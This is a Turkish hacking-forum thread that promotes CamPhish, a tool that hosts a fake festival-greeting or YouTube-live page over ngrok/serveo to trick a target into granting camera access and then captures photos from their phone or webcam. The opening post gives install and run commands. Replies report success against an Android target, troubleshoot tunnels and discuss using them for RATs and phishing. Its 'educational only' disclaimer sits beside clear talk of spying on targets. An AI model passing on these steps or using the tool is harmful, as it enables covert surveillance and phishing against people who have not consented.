Linke Tıklayarak Ön kamera Hack

330dmintasfor00

Katılımcı Üye
28 Mar 2020
918
118
BU SADECE EĞİTİM VE BİLGİLENDİRME AMAÇLI BİR KONUDUR...
Konuyu beğendiyseniz Teşekkür edip beni mutlu edebilirsiniz

CamPhish
Sadece bağlantı göndererek hedefin telefon ön kamerasından veya PC web kamerasından kamera çekimlerini alın.

CamPhish nedir?
CamPhish hedef telefon telefon kamera veya PC web kamerası cam çekim çekmek için tekniklerdir. CamPhish Yerleşik PHP sunucusunda sahte bir web sitesi barındırır ve ngrok & serveo'yu kullanarak internet üzerinden kullanılabilecek hedefe ileteceğimiz bir bağlantı oluşturur. web sitesi kamera izni ister ve hedef izin veriyorsa, bu araç hedefin cihazının kamera görüntülerini alır
Özellikleri
Bu araçta, kamın daha fazla resmini elde etmek için web sayfasında ilgili hedef için iki otomatik web sayfası şablonu ekledim

Festival Dilekleri
Canlı YouTube TV
festival adını veya youtube'un video kimliğini girmeniz yeterlidir

Kurulum ve gereksinimler
Bu araç, web sunucusu, SSH veya serveo bağlantısı için PHP gerektirir. İlk önce terminalinizde aşağıdaki komutu çalıştırın
apt-get -y install php openssh git wget

Kurulum (Kali Linux / Termux):

git clone https://github.com/techchipnet/CamPhish
cd CamPhish
bash camphish.sh

BEN ETKİNLİK YAZDIM SİZ BAŞKA BAŞLIKLAR YAZABİLİRSİNİZ​
:
XcDzLX.png
[/url][/IMG]​

selami1221

Yeni üye
11 Nis 2020
6
0
Denedim hedef android telefon kullaniyor
basarili ama iPhone de siyah ekran çekiyor sadece nedeni ne olabilir :)

GhrikeMask

Katılımcı Üye
17 Nis 2019
504
31
Network

CamPhish
Sadece bağlantı göndererek hedefin telefon ön kamerasından veya PC web kamerasından kamera çekimlerini alın.

CamPhish nedir?
CamPhish hedef telefon telefon kamera veya PC web kamerası cam çekim çekmek için tekniklerdir. CamPhish Yerleşik PHP sunucusunda sahte bir web sitesi barındırır ve ngrok & serveo'yu kullanarak internet üzerinden kullanılabilecek hedefe ileteceğimiz bir bağlantı oluşturur. web sitesi kamera izni ister ve hedef izin veriyorsa, bu araç hedefin cihazının kamera görüntülerini alır
Özellikleri
Bu araçta, kamın daha fazla resmini elde etmek için web sayfasında ilgili hedef için iki otomatik web sayfası şablonu ekledim

Festival Dilekleri
Canlı YouTube TV

Kurulum ve gereksinimler
Bu araç, web sunucusu, SSH veya serveo bağlantısı için PHP gerektirir. İlk önce terminalinizde aşağıdaki komutu çalıştırın

git clone https://github.com/techchipnet/CamPhish
cd CamPhish
bash camphish.sh

:
XcDzLX.png
[/url][/IMG]​

Daha detaylı anlatım yapar mısınız örneğin bir video ile.

synsist

Yeni üye
19 May 2020
40
0
peki hedef kişi bizsek kameramıza erişildiğini nasıl anlarız ve nasıl erişimi kapatırız

Noodix

Yeni üye
7 Eyl 2022
8
2
ngrok hatasinin vermesinin nedeni ngrok desteklerini çekti sanirim + kameradan çekilen fotoğraflar sdcard daki fotoğraflar bölümüne kaydediyor.

Noodix

Yeni üye
7 Eyl 2022
8
2
qruex abinin dedigi gibi izin istiycek yolluycaginiz adam neden izin versinki? yani çalissa bize kimse izin vermez

darksideofwww

Katılımcı Üye
28 Tem 2022
913
514
dsowww
Ngrok gelen şikayetlerde dolayi desteğini çekiyor dostlar kendiniz yazmadığınız taktirde emek olmadan yemek olmaz mantığı phishing zorlaşacak.Ve yeni bir yöntem bulunana dek ngrok kullanan toollar iş görmeyecek :) :)

sempron04

Yeni üye
11 Kas 2021
9
7
Ngrok gelen şikayetlerde dolayi desteğini çekiyor dostlar kendiniz yazmadığınız taktirde emek olmadan yemek olmaz mantığı phishing zorlaşacak.Ve yeni bir yöntem bulunana dek ngrok kullanan toollar iş görmeyecek :) :)
Hocam yani biz artik o tünellerimizi rat phishing gibi işlerde kullanamayacakmıyız?
Rat için tünel açamayacakmiyiz çünkü bu siralar ne zaman ngrok üzerinden rat olurtursam bir anda error veriyor ve ngrok tam o esnada duruyor.

JohnWick51

Uzman üye
20 Mar 2022
1,865
770
28

CamPhish

CamPhish nedir?
Özellikleri

Festival Dilekleri
Canlı YouTube TV

Kurulum ve gereksinimler

git clone GitHub - techchipnet/CamPhish: Grab cam shots from target's phone front camera or PC webcam just sending a link.
cd CamPhish
bash camphish.sh

:
XcDzLX.png
[/url][/IMG]​
Ellerine saglik

darksideofwww

Katılımcı Üye
28 Tem 2022
913
514
dsowww
Hocam yani biz artik o tünellerimizi rat phishing gibi işlerde kullanamayacakmıyız?
Rat için tünel açamayacakmiyiz çünkü bu siralar ne zaman ngrok üzerinden rat olurtursam bir anda error veriyor ve ngrok tam o esnada duruyor.
ngrok ile alakalı toollar çalışmayacak ngrok phishing için kullanılmayacak bilgim dahilinde herhangi bir fantastik durum olmazsa :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.